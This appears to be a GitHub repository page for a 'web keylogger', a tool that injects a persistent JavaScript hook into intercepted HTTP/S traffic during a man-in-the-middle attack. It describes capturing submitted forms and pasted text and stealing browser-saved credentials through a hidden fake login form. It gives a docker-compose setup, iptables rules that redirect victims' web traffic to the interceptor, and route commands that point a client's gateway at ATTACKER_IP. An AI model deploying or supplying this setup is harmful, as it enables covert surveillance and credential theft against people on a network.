Skip to content

fukaminakrize/http_keylogger

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

34 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Web Keylogger

Tool for injecting monitoring script into the HTTP/S traffic during MITM attack. The script is capable of monitoring selected user's activities (submiting forms and pasting text) and extraction of user's stored credentials. Upon initial injection to the web page (origin), script is able to persist itself inside a browser and operate even after the MITM attack has completed up until user clears his/her browser.

mitmproxy

mitmproxy is an interactive, SSL/TLS-capable intercepting proxy with a console interface for HTTP/1, HTTP/2, and WebSockets.

Schema

Keylogger

  • Web-service logging data from the Hook and visualizing them

JS Hook

  • Intercepts:
    • data submitted to forms,
    • pasted text into webpage
  • Extracts user's credential by faking login form --- if credentials are stored for the domain, browser (Chrome, Firefox) inserts them into the hidden fake login form

docker-compose.yml

version: '3.5'

services:
  injector:
    image: injector
    container_name: injector
    build:
      context: ./injector
    volumes:
      - ./data/mitmproxy:/root/.mitmproxy
    ports:
      - 8080:8080
    environment:
      - HOOK_HOST=$HOOK_HOST
      - HOOK_PORT_HTTP=$HOOK_PORT_HTTP
      - HOOK_PORT_HTTPS=$HOOK_PORT_HTTPS
    network_mode: host

  keylogger:
    image: nesatfit/keylogger:latest
    build:
      context: ./keyloggerServer
    container_name: keylogger
    command: --db=mongo --hook_host=$HOOK_HOST --hook_port_http $HOOK_PORT_HTTP --hook_port_https $HOOK_PORT_HTTPS
    ports:
      - 8081:80
      - 8445:443
      - 7000:7000
    restart: unless-stopped
    volumes:
      - ./data/mitmproxy:/data/mitmproxy
      - ./data/haproxy:/data/haproxy
    depends_on:
      - injector
      - mongo
    environment:
      - HOOK_HOST=$HOOK_HOST

  mongo:
    container_name: keylogger_mongo
    image: mongo
    restart: unless-stopped
    volumes:
      - ./data/mongo:/data/db

Server Setup

# Modify .env and docker-compose.yml variables to reflect your environment
docker-compose up -d

# Setup firewall rules
sysctl -w net.ipv4.ip_forward=1
sysctl -w net.ipv4.conf.all.send_redirects=0
iptables -P FORWARD ACCEPT
iptables -t nat -N MITM
iptables -t nat -A MITM -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A MITM -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080

# Enable
iptables -t nat -A PREROUTING -j MITM

# Disable
iptables -t nat -D PREROUTING -j MITM

Client Setup

# Simulate MITM by setting a default gateway to attackers IP
ip route del to default via ORIGINAL_DEFAULT_GATEWAY_IP
ip route add default via ATTACKER_IP

Visit mitm.it in client browser and install CA certificate

Demonstration

Read more

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 52.9%
  • JavaScript 24.3%
  • HTML 16.6%
  • Shell 3.5%
  • Dockerfile 2.7%